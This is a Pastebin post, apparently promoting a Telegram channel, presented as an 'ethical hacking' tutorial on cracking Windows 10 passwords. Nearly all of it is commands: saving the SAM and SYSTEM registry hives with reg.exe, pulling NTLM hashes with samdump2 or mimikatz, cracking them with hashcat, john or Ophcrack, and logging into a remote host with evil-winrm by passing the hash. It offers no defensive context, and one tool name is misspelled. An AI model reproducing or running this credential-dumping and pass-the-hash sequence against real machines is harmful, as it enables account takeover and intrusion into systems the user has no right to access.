Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How To crack the Windows Password using SAM file How To crack the Windows Password using SAM file, complete Ethical hacking (Hacking into Windows 10)
- Tools we are going to use:
- **********************************************
- Telegram post:
- https://t.me/efxtv2/3730
- **********************************************
- 1. reg.exe : Extract SAM and SYSTEM file
- 2. samdump2 : Extract the hash
- 3. hashcat : Crack the hash
- 4. mimikatz : Extract the hash
- 5. john : Crack the hash
- 6. OPHCRACK : Crack the hash
- 7. revil-winrm : Hack remote host using hash
- # Get the SAM and SYSTEM file using reg.exe
- - Open CMD as admin and type to save the file
- $ reg.exe save hklm\sam C:\Users\demo\Desktop\sam
- $ reg.exe save hklm\SYSTEM C:\Users\demo\Desktop\SYSTEM
- # Extract hash with NTLM SAM
- $ sudo samdump2 SYSTEM SAM > hashes.txt
- # Extract the NTLM hashes method 2
- - Go to https://github.com/ParrotSec/mimikatz
- - Download as zip, Extract the zip.
- - Get into 64/32 bit folder
- - Run mimikatz.exe.
- - Run the command
- $ lsadump::sam /system:C:\Users\demo\Desktop\SYSTEM /sam:C:\Users\demo\Desktop\sam
- - copy the NTLM hashes save in hashes.txt
- # Crack the NTLM hashes
- $ hashcat -m 1000 -a 0 ./hashes.txt /usr/share/wordlists/rockyou.txt
- # Crack NTLM hashes method 2
- $ john --format=NT hash.txt
- # Crack the NTLM hashes method 3 (GUI) (work with java17)
- STEP 1: Go to Google and search for "OPH CRACKkali rainbow tables"
- - Download tables
- - XP free small (380MB)
- - Download Vista free (461MB)
- STEP 2: Open OPHCRACK and click on tables
- - Click on XP free small
- - Click on install
- - Locate the extracted file
- - Click open Click ok
- STEP 3 Copy extracted hash
- - Click Load
- - Single Hash
- - Click ok
- - Click Crack
- # Login to windows evil-winrm
- $ revil-winrm -i 192.168.1.43 -u demo -H hashesddddddddddddlk
- $ revil-winrm -i 192.168.1.43 -u demo -p password
- #Windows password cracking using #KaliLinux tools.
- Complete #EthicalHacking tutorial.
- Thank you Regards
- @EFXTv
- Join VIP t.me/ERRORFIX_tv
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement